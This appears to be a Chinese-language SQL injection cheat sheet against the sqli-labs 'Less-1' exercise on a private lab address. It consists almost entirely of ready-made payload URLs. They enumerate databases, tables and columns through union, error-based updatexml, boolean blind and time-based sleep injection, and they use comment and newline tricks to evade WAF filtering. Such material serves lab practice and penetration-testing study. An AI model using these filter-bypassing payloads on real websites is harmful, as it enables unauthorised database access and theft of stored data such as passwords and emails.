http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select schema_name from %23%0ainformation_schema.schemata limit 1,1),3 -- +
查表名
1
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select table_name from %23%0ainformation_schema.tables where table_schema=database(%23%0a) limit 1,1),3 -- +
查列名,首先是没开information_schema防护时
1
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a select 1,(select column_name from %23%0a information_schema.columns where table_name=0x7573657273 and%23a%0a table_schema=database(%23%0a) limit 1,1),3 -- +
开information_schema防护有两种姿势,不过需要知道表名
一、子查询
1
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a SELECT 1,2,x.2 from %23a%0a(SELECT * from %23a%0a (SELECT 1)a, (SELECT 2)b union %23a%0aSELECT *from %23a%0aemails)x limit 2,1 -- +
二、用join和using爆列名,前提是页面可以报错,需要已知表名
1
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b) c) -- +
然后通过using来继续爆
1
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b using(id)) c) -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,user(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,database(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
库名
1
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select schema_name from %23a%0a information_schema.schemata limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
表名
1
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select table_name from %23a%0a information_schema.tables where table_schema=database(/*!)*/ limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
列名
1
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select column_name from %23a%0a information_schema.columns where table_schema=database(/*!)*/ and %23a%0atable_name=0x7573657273 limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
查数据
1
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,(select email_id from %23a%0a emails limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
5 盲注
分布尔盲注和时间盲注来说吧
5.1 布尔盲注
不让他匹配完整括号对
使用left()或者right()
1
2
http://172.16.1.157/sql/Less-1/?id=1' and hex(LEFT(user(/*!)*/,1))=%23a%0a72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(right(user(/*!)*/,1))=%23a%0a72 -- +
使用substring() substr()
1
2
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTRING(user(/*!)*/,1,1))=72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(substr(user(/*!)*/,1,1))=72 -- +
查表名
1
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTR((select table_name from %23a%0a information_schema.tables where table_schema=%23a%0adatabase%23a%0a(/*!)*/ limit 0,1),1,1))=65-- +
列名字段名同理,略
5.2 时间盲注
不匹配成对括号
sleep()绕过
1
http://172.16.1.157/sql/Less-1/?id=1' and sleep(3/*!)*/-- +
查用户
1
2
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=char(114),sleep(3/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=0x72,sleep(3/*!)*/,1/*!)*/ -- +
查数据 limit过不了
1
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left((select group_concat(table_name/*!)*/ from%23a%0ainformation_schema.tables where table_schema=database(/*!)*/ /*!)*/,1/*!)*/=0x65,sleep(5/*!)*/,1/*!)*/ -- +
6 其他
length()长度
1
2
http://172.16.1.157/sql/Less-1/?id=1' and length(1)<=>1 -- +
http://172.16.1.157/sql/Less-1/?id=1' and length(database(/*!))*/<=>8 -- +
count()
1
http://172.16.1.157/sql/Less-1/?id=1' and (%23a%0aselect count(password/*!)*/ from %23a%0a users/*!)*/<=>13 -- +
